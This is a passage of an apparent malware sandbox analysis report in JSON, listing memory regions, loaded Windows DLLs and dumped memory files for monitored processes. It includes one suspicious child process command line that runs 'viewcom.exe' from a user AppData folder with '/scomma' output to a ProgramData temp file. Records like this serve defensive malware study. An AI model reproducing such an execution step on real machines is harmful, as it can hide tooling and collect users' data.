created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, "filename": null, "id": "region_1159", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:12.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 368640, "start_va": 1874788352, "type": "region", "version": 1 }, "end_va": 1875156991, "entry_point": 1874796341, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_1160", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 1874788352, "timestamp": "00:01:12.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1970274304, "type": "region", "version": 1 }, "end_va": 1970331647, "entry_point": 1970278965, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_1161", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1970274304, "timestamp": "00:01:12.252", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001162-addr_0x0000000001fc0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 33292288, "type": "region", "version": 1 }, "end_va": 34340863, "entry_point": 0, "filename": null, "id": "region_1162", "name": "private_0x0000000001fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33292288, "timestamp": "00:01:12.266", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1820590080, "type": "region", "version": 1 }, "end_va": 1820622847, "entry_point": 1820601510, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_1163", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 1820590080, "timestamp": "00:01:12.266", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001164-addr_0x000000007ffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147311616, "type": "region", "version": 1 }, "end_va": 2147315711, "entry_point": 0, "filename": null, "id": "region_1164", "name": "private_0x000000007ffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147311616, "timestamp": "00:01:12.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1945763840, "type": "region", "version": 1 }, "end_va": 1945837567, "entry_point": 1945776753, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_1291", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1945763840, "timestamp": "00:01:12.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1945894912, "type": "region", "version": 1 }, "end_va": 1945948159, "entry_point": 1945903122, "filename": "\\Windows\\System32\\dhcpcsvc6.dll", "id": "region_1292", "name": "dhcpcsvc6.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc6.dll", "region_type": "memory_mapped_file", "start_va": 1945894912, "timestamp": "00:01:12.635", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001293-addr_0x00000000003d0000-size_0x0000000000024000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4145151, "entry_point": 0, "filename": null, "id": "region_1293", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:01:17.685", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001294-addr_0x0000000001ad0000-size_0x000000000009f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 651264, "start_va": 28114944, "type": "region", "version": 1 }, "end_va": 28766207, "entry_point": 0, "filename": null, "id": "region_1294", "name": "private_0x0000000001ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28114944, "timestamp": "00:01:17.688", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001295-addr_0x0000000001ba0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 29032447, "entry_point": 0, "filename": null, "id": "region_1295", "name": "private_0x0000000001ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28966912, "timestamp": "00:01:17.688", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001296-addr_0x00000000020c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 35389439, "entry_point": 0, "filename": null, "id": "region_1296", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:01:17.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001297-addr_0x00000000021c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 36438015, "entry_point": 0, "filename": null, "id": "region_1297", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:01:17.690", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001298-addr_0x00000000022c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 36438016, "type": "region", "version": 1 }, "end_va": 37486591, "entry_point": 0, "filename": null, "id": "region_1298", "name": "private_0x00000000022c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36438016, "timestamp": "00:01:17.690", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001299-addr_0x000000007ffd4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147303424, "type": "region", "version": 1 }, "end_va": 2147307519, "entry_point": 0, "filename": null, "id": "region_1299", "name": "private_0x000000007ffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147303424, "timestamp": "00:01:17.690", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001300-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_1300", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:01:17.691", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001301-addr_0x0000000001a30000-size_0x0000000000061000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 397312, "start_va": 27459584, "type": "region", "version": 1 }, "end_va": 27856895, "entry_point": 0, "filename": null, "id": "region_1301", "name": "private_0x0000000001a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 27459584, "timestamp": "00:01:17.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001302-addr_0x0000000001ac0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_230", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 28049408, "type": "region", "version": 1 }, "end_va": 28114943, "entry_point": 0, "filename": null, "id": "region_1302", "name": "private_0x0000000001ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28049408, "timestamp": "00:01:17.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001303-addr_0x00000000023c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_231", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 38535167, "entry_point": 0, "filename": null, "id": "region_1303", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:01:17.701", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001304-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_232", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": "region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_1304", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:01:17.701", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001305-addr_0x0000000001aa0000-size_0x000000000001e000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_233", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 27918336, "type": "region", "version": 1 }, "end_va": 28041215, "entry_point": 0, "filename": null, "id": "region_1305", "name": "private_0x0000000001aa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27918336, "timestamp": "00:01:17.706", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001306-addr_0x00000000024c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_234", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 38535168, "type": "region", "version": 1 }, "end_va": 39583743, "entry_point": 0, "filename": null, "id": "region_1306", "name": "private_0x00000000024c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38535168, "timestamp": "00:01:17.707", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001307-addr_0x000000007ffaf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_235", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147151872, "type": "region", "version": 1 }, "end_va": 2147155967, "entry_point": 0, "filename": null, "id": "region_1307", "name": "private_0x000000007ffaf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147151872, "timestamp": "00:01:17.709", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001308-addr_0x0000000001300000-size_0x0000000000006000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_236", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 24576, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 19947519, "entry_point": 0, "filename": null, "id": "region_1308", "name": "private_0x0000000001300000", "norm_filename": null, "region_type": "private_memory", "start_va": 19922944, "timestamp": "00:01:17.711", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001309-addr_0x00000000025c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_237", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 39583744, "type": "region", "version": 1 }, "end_va": 40632319, "entry_point": 0, "filename": null, "id": "region_1309", "name": "private_0x00000000025c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39583744, "timestamp": "00:01:17.711", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001310-addr_0x000000007ffae000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_238", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147147776, "type": "region", "version": 1 }, "end_va": 2147151871, "entry_point": 0, "filename": null, "id": "region_1310", "name": "private_0x000000007ffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147147776, "timestamp": "00:01:17.712", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001311-addr_0x00000000026c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 40632320, "type": "region", "version": 1 }, "end_va": 41680895, "entry_point": 0, "filename": null, "id": "region_1311", "name": "private_0x00000000026c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40632320, "timestamp": "00:01:17.734", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001312-addr_0x000000007ffad000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_240", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147143680, "type": "region", "version": 1 }, "end_va": 2147147775, "entry_point": 0, "filename": null, "id": "region_1312", "name": "private_0x000000007ffad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147143680, "timestamp": "00:01:17.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1895038976, "type": "region", "version": 1 }, "end_va": 1895112703, "entry_point": 1895043584, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_1313", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1895038976, "timestamp": "00:01:17.751", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1944780800, "type": "region", "version": 1 }, "end_va": 1944850431, "entry_point": 1944780800, "filename": "\\Windows\\System32\\netapi32.dll", "id": "region_1314", "name": "netapi32.dll", "norm_filename": "c:\\windows\\system32\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944780800, "timestamp": "00:01:17.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944715264, "type": "region", "version": 1 }, "end_va": 1944752127, "entry_point": 1944720806, "filename": "\\Windows\\System32\\netutils.dll", "id": "region_1315", "name": "netutils.dll", "norm_filename": "c:\\windows\\system32\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944715264, "timestamp": "00:01:17.836", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969000447, "entry_point": 1968902937, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1316", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:17.841", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1944649728, "type": "region", "version": 1 }, "end_va": 1944711167, "entry_point": 1944649728, "filename": "\\Windows\\System32\\wkscli.dll", "id": "region_1317", "name": "wkscli.dll", "norm_filename": "c:\\windows\\system32\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1944649728, "timestamp": "00:01:17.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1937768448, "type": "region", "version": 1 }, "end_va": 1937829887, "entry_point": 1937768448, "filename": "\\Windows\\System32\\samcli.dll", "id": "region_1318", "name": "samcli.dll", "norm_filename": "c:\\windows\\system32\\samcli.dll", "region_type": "memory_mapped_file", "start_va": 1937768448, "timestamp": "00:01:17.927", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\" /scomma \"C:\\ProgramData\\9F1B.tmp\"", "filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe", "id": "proc_8", "image_name": "viewcom.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001320-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_242", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1320", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:18.371", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001321-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_243", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1321", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:18.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_1322", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:18.374", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001323-addr_0x0000000000400000-size_0x000000000001c000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_244", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 114688, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4308991, "entry_point": 0, "filename": null, "id": "region_1323", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:18.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 2002518016, "type": "region", "version": 1 }, "end_va": 2003812351, "entry_point": 2002518016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1324", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002518016, "timestamp": "00:01:18.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2004881407, "entry_point": 2004877312, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1325", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:18.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1326", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:18.383", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001327-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_245", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1327", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:18.384", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001328-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_246", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1328", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:18.385", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001339-addr_0x0000000000250000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_253", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_1339", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:18.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1972477951, "entry_point": 1972207072, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1340", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:18.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1983184896, "type": "region", "version": 1 }, "end_va": 1984053247, "entry_point": 1983495652, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1341", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1983184896, "timestamp": "00:01:18.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1342", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:18.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1343", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:01:18.461", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001344-addr_0x0000000000240000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_254", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_1344", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:18.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5144575, "entry_point": 0, "filename": null, "id": "region_1345", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:18.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1916534784, "type": "region", "version": 1 }, "end_va": 1917075455, "entry_point": 1916534784, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1346", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1916534784, "timestamp": "00:01:18.465", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1973878784, "type": "region", "version": 1 }, "end_va": 1974521855, "entry_point": 1974091735, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1347", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1973878784, "timestamp": "00:01:18.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ 